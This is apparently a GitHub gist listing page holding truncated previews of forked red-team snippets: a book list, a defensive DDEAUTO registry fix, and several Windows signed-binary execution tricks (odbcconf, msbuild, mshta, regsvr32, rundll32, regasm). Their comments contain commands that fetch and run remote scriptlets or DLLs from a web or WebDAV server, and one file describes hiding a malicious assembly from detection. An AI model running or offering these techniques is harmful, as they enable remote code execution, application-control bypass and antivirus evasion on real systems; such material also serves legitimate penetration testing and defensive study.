Anthony Bordel minkione
minkione
/ get_gists.py
Created
November 3, 2017 07:20
— forked from leoloobeek/get_gists.py
Download all gists for a specific user
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # first: mkdir user && cd user && cp /path/to/get_gists.py . | |
| # python3 get_gists.py user | |
| import requests | |
| import sys | |
| from subprocess import call | |
| user = sys.argv[1] | |
| r = requests.get('https://api.github.com/users/{0}/gists'.format(user)) |
minkione
/ gist:42052b96df1a2cbd1a01d90ea1defb70
Created
November 19, 2017 20:16
— forked from carnal0wnage/gist:606c41ac6ec40bf5c69d4db96d9312e3
Red Team Books
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From: http://redteams.net/bookshelf/ | |
| Techie | |
| Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp. | |
| Social Engineering: The Art of Human Hacking by Christopher Hadnagy | |
| Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam | |
| The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick | |
| Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others. | |
| Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor | |
| The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors |
minkione
/ disable_ddeauto.reg
Created
November 23, 2017 10:10
— forked from wdormann/disable_ddeauto.reg
Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options] | |
| "DontUpdateLinks"=dword:00000001 | |
| [HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options] | |
| "DontUpdateLinks"=dword:00000001 | |
| [HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options] | |
| "DontUpdateLinks"=dword:00000001 |
minkione
/ odbcconf.cs
Created
November 27, 2017 11:28
— forked from Arno0x/odbcconf.cs
Download and execute arbitrary code with odbcconf.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| To use with odbcconf.exe: | |
| odbcconf /S /A {REGSVR odbcconf.dll} | |
| or, from a remote location (if WebDAV support enabled): | |
| odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll} | |
| */ | |
| using System; |
minkione
/ msbuild.xml
Created
November 27, 2017 11:28
— forked from Arno0x/msbuild.xml
MSBuild project definition to execute arbitrary code from msbuild.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> | |
| </Target> | |
| <UsingTask | |
| TaskName="SharpLauncher" | |
| TaskFactory="CodeTaskFactory" |
minkione
/ calc.hta
Created
November 27, 2017 11:28
— forked from Arno0x/calc.hta
HTML Application example to be executed by mstha.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <HTA:APPLICATION ID="HelloExample"> | |
| <script language="jscript"> | |
| var c = "cmd.exe /c calc.exe"; | |
| new ActiveXObject('WScript.Shell').Run(c); | |
| </script> | |
| </head> | |
| <body> | |
| <script>self.close();</script> |
minkione
/ regsvr32.sct
Created
November 27, 2017 11:28
— forked from Arno0x/regsvr32.sct
A scriptlet that can be executed by regsvr32.exe for arbitrary code execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll --> | |
| <!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll --> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{10001111-0000-0000-0000-0000FEEDACDC}" > | |
| <script language="JScript"> | |
| <![CDATA[ | |
minkione
/ scriptlet.sct
Created
November 27, 2017 11:28
— forked from Arno0x/scriptlet.sct
Scriplet that can be executed by mshta or rundll32 for arbitrary code execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> | |
| <!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --> | |
| <scriptlet> | |
| <public> | |
| </public> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); |
minkione
/ regasm.cs
Created
November 27, 2017 11:28
— forked from Arno0x/regasm.cs
A DLL that can be called from regasm.exe/regsvc.exe to execute arbitrary code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ============== Compile ============ | |
| Create Your Strong Name Key -> key.snk | |
| $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' | |
| $Content = [System.Convert]::FromBase64String($key) | |
| Set-Content key.snk -Value $Content -Encoding Byte | |
| C:\Windows\Microsoft.NET\Framewor |
minkione
/ malicious.cs
Created
November 27, 2017 11:28
— forked from Arno0x/malicious.cs
Hide malicious assembly in another one with RunTime code compiling
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| DO NOT COMPILE THIS SOURCE FILE ! | |
| Encode this source in base64: | |
| base64 -w0 malicious.cs > malicious.b64 | |
| Then paste it in the code in "not_detected.cs" source file |